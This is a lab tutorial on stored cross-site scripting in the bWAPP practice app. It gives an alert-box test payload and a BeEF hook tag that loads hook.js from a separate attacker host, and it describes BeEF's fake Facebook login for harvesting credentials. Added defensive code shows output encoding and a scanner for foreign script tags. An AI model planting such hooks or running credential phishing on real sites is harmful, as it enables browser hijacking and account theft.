Stored XSS (or Persistent XSS) is the most dangerous type of XSS. The attacker injects a script (the payload) that is permanently stored (persisted) on the vulnerable site, typically in its database.
The malicious code is executed every time a browser loads the “infected” page, so with a single injection the attacker can hit every user who views it. Usually the script is inserted through a comment field on a blog or a forum post: any input that is saved and later displayed to other users will do.
For this tutorial we’ll use the bWAPP vulnerable web application.
Start the bee-box and check its IP address (open a terminal and type “ifconfig”); in my case it is 192.168.1.10. Now open your browser, connect to the bee-box address, log in and choose Cross-Site Scripting – Stored (Blog).
CHECK IF IT IS VULNERABLE
To test whether the input field is vulnerable, we try to inject this script:
<script>alert('XSS')</script>
If the field is vulnerable, the page will show an alert box that says XSS. As you can see, the alert box appears, which means the field is vulnerable.
Now, if you log in and visit this page from another browser, you’ll see that the alert box appears again, because our payload has been saved in the database and is served to every visitor.
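The following is an added example, not code from the tutorial or from bWAPP: a minimal model of a blog comment feature that shows why the stored payload above fires for every visitor, placed next to the hardened version of the same renderer. The comment store, the HTML template and the two sample comments are constructed stand-ins for what bWAPP keeps in its database.

```javascript
// Added example, not code from the tutorial or from bWAPP: a minimal model of
// a blog-comment feature that shows why a stored payload fires for every
// visitor. The comment store and the HTML template are constructed stand-ins.

const comments = []; // stands in for the database table the blog writes to

// A comment is saved once and then served to every later visitor.
function storeComment(author, text) {
  comments.push({ author, text });
}

// Vulnerable renderer: the stored text is concatenated straight into the HTML,
// so a comment containing <script> becomes live markup in every visitor's page.
function renderVulnerable() {
  return comments
    .map((c) => `<div class="entry"><b>${c.author}</b>: ${c.text}</div>`)
    .join("\n");
}

// HTML-encode the characters that can open or close markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: same template, but user-controlled fields are encoded on
// output, so the browser shows the payload as text instead of executing it.
function renderSafe() {
  return comments
    .map((c) => `<div class="entry"><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.text)}</div>`)
    .join("\n");
}

// Simple check a tester can run on the fetched page: did the payload come back
// as a real <script> tag (vulnerable) or only as encoded text (safe)?
function containsLiveScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

storeComment("bee", "Nice post");
storeComment("attacker", "<script>alert('XSS')</script>"); // the test payload from above

console.log(renderVulnerable());
console.log("vulnerable page executes script:", containsLiveScript(renderVulnerable())); // true
console.log("hardened page executes script:", containsLiveScript(renderSafe()));       // false
```

The point of the pair is that the payload is identical in both cases and is stored in both cases; what decides whether it executes is whether the page encodes user-controlled text at the moment it is written into the HTML.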
BeEF
A common way to exploit an XSS is BeEF (Browser Exploitation Framework). With this tool we can perform many different types of attacks. You can download BeEF from here. If you use Kali Linux or any other penetration testing distro, you will find it already installed.
When you start BeEF you will see the Hook URL, which will be our payload, and the UI URL, which is the user interface panel.
Open the user interface panel in your browser and log in; the default username and password are beef:beef.
On the left side we can see “Online Browsers” and “Offline Browsers”, which list the hooked browsers that are currently connected and those that are not.
Ok, let’s start the attack. Get the IP address of the machine running BeEF (open a terminal and type “ifconfig”; in my case 192.168.1.19, not the bee-box address) and insert it in the Hook URL in this way:
<script src="http://192.168.1.19:3000/hook.js"></script>
Now go back to bWAPP, delete the script you inserted previously, and add the new BeEF script.
Visit the “infected” page from another browser or another computer and you should see the hooked browsers appear in the panel. In my case Linux and OSX.
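The hook above is just a script tag whose src points at a host that is not the blog itself, and that is also what makes it easy to spot from the defender's side. The following is an added example, not part of BeEF, bWAPP or the tutorial: it scans a set of stored blog entries for script tags that load from an origin other than the site's and reports the host, port and path of each one. The site origin (the bee-box address from the tutorial) and the five sample entries are constructed data.

```javascript
// Added example, not part of BeEF or bWAPP: scan stored blog entries for
// <script src=...> tags that load from a host other than the site itself,
// which is what the BeEF hook looks like once it is sitting in the database.
// The site origin and the entries are constructed sample data.

const SITE_ORIGIN = "http://192.168.1.10"; // the bee-box address used in the tutorial

const storedEntries = [
  "Great writeup, thanks!",
  '<script src="http://192.168.1.19:3000/hook.js"></script>', // BeEF hook from above
  "<script>alert('XSS')</script>",                            // inline, no src
  'see <a href="http://192.168.1.10/portal.php">portal</a>',  // not a script tag
  "<SCRIPT SRC='//192.168.1.19:3000/hook.js'></SCRIPT>",       // protocol-relative variant
];

// Return every script src in `html` whose origin differs from the site's.
// Matches the tag case-insensitively and accepts double, single or no quotes.
function externalScriptSources(html, siteOrigin) {
  const re = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const site = new URL(siteOrigin).origin;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const raw = m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
    let url;
    try {
      url = new URL(raw, siteOrigin); // resolves relative and //host forms against the site
    } catch (e) {
      continue; // unparsable src, not a URL we can classify
    }
    if (url.origin !== site) {
      found.push({ src: raw, host: url.hostname, port: url.port, path: url.pathname });
    }
  }
  return found;
}

// Run the check over every stored entry and report which ones carry a hook.
function scanEntries(entries, siteOrigin) {
  const hits = [];
  entries.forEach((html, index) => {
    for (const s of externalScriptSources(html, siteOrigin)) {
      hits.push({ entry: index, ...s });
    }
  });
  return hits;
}

console.log(scanEntries(storedEntries, SITE_ORIGIN));
```

Resolving each src against the site origin with the URL parser, rather than string-matching "http://", is what catches the protocol-relative form in the last entry; it loads from the same BeEF server as the first hook but contains no scheme at all.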
Now let’s try an attack to see what BeEF can do.
Go to the Commands tab, open the Social Engineering folder and select Pretty Theft. Under Dialog Type select Facebook and click Execute.
This command opens a Facebook-style login dialog in the victim’s browser. If the victim enters their login details, we receive them.
If you click on the command result, you will see the victim’s credentials.
This is just one example of what you can do with BeEF; as you can see, there are many other commands that can be executed.